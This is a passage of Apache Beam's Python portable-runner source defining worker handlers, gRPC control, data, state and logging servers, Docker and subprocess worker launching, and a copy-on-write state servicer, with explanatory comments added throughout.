self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (BeamFnControlServicer.DoneMarker) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> beam_fn_api_pb2.InstructionRequest
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
def abort(self, exn):
for future in self._futures_by_id.values():
future.abort(exn)
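# A ControlConnection owns the request queue consumed by the servicer below: push()
# registers a ControlFuture keyed by instruction_id, and the background read thread
# resolves that future when the matching InstructionResponse arrives from the worker.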
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
class DoneMarker(object):
pass
_DONE_MARKER = DoneMarker()
def __init__(
self,
worker_manager, # type: WorkerHandlerManager
):
self._worker_manager = worker_manager
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
      raise RuntimeError(
          'All workers communicating through gRPC should have a '
          'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug(
'Runner: Requests multiplexing info: %s',
[(str(req), worker)
for req, worker in self._req_worker_mapping.items()])
def GetProcessBundleDescriptor(self, id, context=None):
return self._worker_manager.get_process_bundle_descriptor(id)
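# Illustrative sketch (hypothetical names, not executed): the control plane is
# multiplexed per worker. Each SDK worker opens a Control() stream carrying a
# 'worker_id' metadata entry; the servicer looks up (or lazily creates) that
# worker's ControlConnection and relays queued requests back to the worker:
#
#   worker_id = dict(context.invocation_metadata()).get('worker_id')
#   conn = servicer.get_conn_by_worker_id(worker_id)
#   conn.set_input(response_iterator)
#   # requests pushed onto conn are yielded to the worker until _DONE_MARKER.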
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler,
data_plane_handler,
state, # type: StateServicer
provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
      control_handler: handler used to send instruction requests to the worker.
      data_plane_handler (data_plane.DataChannel): handler for the data plane.
      state: state servicer backing the state API for this worker.
      provision_info: optional provisioning information served to the worker.
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Callable[[T, StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]]
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
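# Illustrative sketch (hypothetical URN and class, not executed): new
# environments are wired in with the register_environment decorator;
# WorkerHandler.create() then dispatches on environment.urn and parses the
# payload with the registered payload type.
#
#   @WorkerHandler.register_environment('my:custom:env:v1', bytes)
#   class MyCustomWorkerHandler(GrpcWorkerHandler):
#     def __init__(self, payload, state, provision_info, grpc_server):
#       super(MyCustomWorkerHandler, self).__init__(
#           state, provision_info, grpc_server)
#       self._payload = payload
#     def start_worker(self):
#       pass  # launch the worker against self.control_address
#     def stop_worker(self):
#       pass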
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
worker_manager._process_bundle_descriptors)
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> None
return None
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, base_info, worker_manager):
# type: (Optional[beam_provision_api_pb2.ProvisionInfo], WorkerHandlerManager) -> None
self._base_info = base_info
self._worker_manager = worker_manager
def GetProvisionInfo(self, request, context=None):
# type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse
info = copy.copy(self._base_info)
if context:
worker_id = dict(context.invocation_metadata())['worker_id']
worker = self._worker_manager.get_worker(worker_id)
info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor())
info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor())
info.control_endpoint.CopyFrom(worker.control_api_service_descriptor())
return beam_provision_api_pb2.GetProvisionInfoResponse(info=info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer(worker_manager)
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(
self.provision_info.provision_info, worker_manager),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir
) # type: beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_LegacyArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.ArtifactRetrievalService(
file_reader=filesystems.FileSystems.open),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
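# Illustrative note (a sketch of the wiring above, not executed): a single
# GrpcServer hosts four insecure servers on ephemeral ports (control, data,
# state and logging); the control server also hosts the provision and artifact
# APIs. One such server is shared by all gRPC-based worker handlers created by
# the WorkerHandlerManager below.
#
#   server = GrpcServer(state_servicer, provision_info, worker_manager)
#   print(server.control_address)   # 'localhost:<control_port>'
#   server.close()                  # stops all four servers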
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
# type: () -> None
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
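# Illustrative note: subclasses override host_from_worker() when the worker
# does not share the runner's network namespace. ExternalWorkerHandler below
# advertises the machine's FQDN (except on Windows and macOS), and
# DockerSdkWorkerHandler uses 'host.docker.internal' on macOS, so that
# endpoints built as
#
#   self.port_from_worker(self._grpc_server.control_port)
#
# resolve correctly from inside the worker.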
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
_LOGGER.info("Requesting worker at %s", self._external_payload.endpoint.url)
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# TODO(BEAM-8646): Reconcile across platforms.
if sys.platform in ['win32', 'darwin']:
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocess module is not thread-safe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
        _LOGGER.info(
            'Waiting for docker to start up. Current status is %s',
            status.decode('utf-8'))
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError(
'SDK failed to start. Final status is %s' %
status.decode('utf-8'))
time.sleep(1)
self._done = False
t = threading.Thread(target=self.watch_container)
t.daemon = True
t.start()
def watch_container(self):
while not self._done:
status = subprocess.check_output(
['docker', 'inspect', '-f', '{{.State.Status}}',
self._container_id]).strip()
if status != b'running':
if not self._done:
logs = subprocess.check_output([
'docker', 'container', 'logs', '--tail', '10', self._container_id
],
stderr=subprocess.STDOUT)
_LOGGER.info(logs)
self.control_conn.abort(
RuntimeError(
'SDK exited unexpectedly. '
'Final status is %s. Final log line is %s' % (
status.decode('utf-8'),
logs.decode('utf-8').strip().split('\n')[-1])))
time.sleep(5)
def stop_worker(self):
# type: () -> None
self._done = True
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._workers_by_id = {} # type: Dict[str, WorkerHandler]
self.state_servicer = StateServicer()
self._grpc_server = None # type: Optional[GrpcServer]
self._process_bundle_descriptors = {}
def register_process_bundle_descriptor(self, process_bundle_descriptor):
self._process_bundle_descriptors[
process_bundle_descriptor.id] = process_bundle_descriptor
def get_process_bundle_descriptor(self, request):
return self._process_bundle_descriptors[
request.process_bundle_descriptor_id]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
# special case for EmbeddedWorkerHandler: there's no need for a gRPC
# server, but we need to pass self instead. Cast to make the type check
# on WorkerHandler.create() think we have a GrpcServer instance.
grpc_server = cast(GrpcServer, self)
elif self._grpc_server is None:
self._grpc_server = GrpcServer(
self.state_servicer, self._job_provision_info, self)
grpc_server = self._grpc_server
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self.state_servicer,
self._job_provision_info.for_environment(environment),
grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s",
worker_handler,
environment)
self._cached_handlers[environment_id].append(worker_handler)
self._workers_by_id[worker_handler.worker_id] = worker_handler
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
"Error closing worker_handler %s" % worker_handler, exc_info=True)
self._cached_handlers = {}
self._workers_by_id = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
def get_worker(self, worker_id):
return self._workers_by_id[worker_id]
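# Illustrative sketch (hypothetical variables, not executed): the runner keeps
# one WorkerHandlerManager per pipeline run and asks it for handlers per
# environment when executing a stage.
#
#   manager = WorkerHandlerManager(pipeline_environments, provision_info)
#   handlers = manager.get_worker_handlers(environment_id, num_workers=2)
#   # ... run bundles against the handlers ...
#   manager.close_all()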
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(list) # type: StateServicer.StateType
self._checkpoint = None # type: Optional[StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = StateServicer.CopyOnWriteState(self._state)
def commit(self):
# type: () -> None
assert isinstance(self._state,
StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
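# Illustrative sketch (hypothetical state key, not executed): checkpoint(),
# commit() and restore() give the runner transactional state for bundle
# retries. Writes made after checkpoint() land in a copy-on-write overlay and
# only reach the underlying state on commit().
#
#   servicer = StateServicer()
#   servicer.checkpoint()
#   servicer.append_raw(some_state_key, b'value')   # buffered in the overlay
#   servicer.restore()                              # discards the write
#   # or servicer.commit() to fold the overlay into the underlying state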
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
self._exception = None
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response and not self._exception:
with self._condition:
if not self._response and not self._exception:
self._condition.wait(timeout)
if self._exception:
raise self._exception
else:
return self._response
def abort(self, exception):
with self._condition:
self._exception = exception
self._condition.notify_all()
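# Illustrative sketch (hypothetical names, not executed): ControlFuture is the
# hand-off between the pushing thread and ControlConnection._read.
#
#   future = ControlFuture('control_1')
#   # reader thread: future.set(response) or future.abort(RuntimeError(...))
#   result = future.get(timeout=30)   # returns the response, or re-raises abort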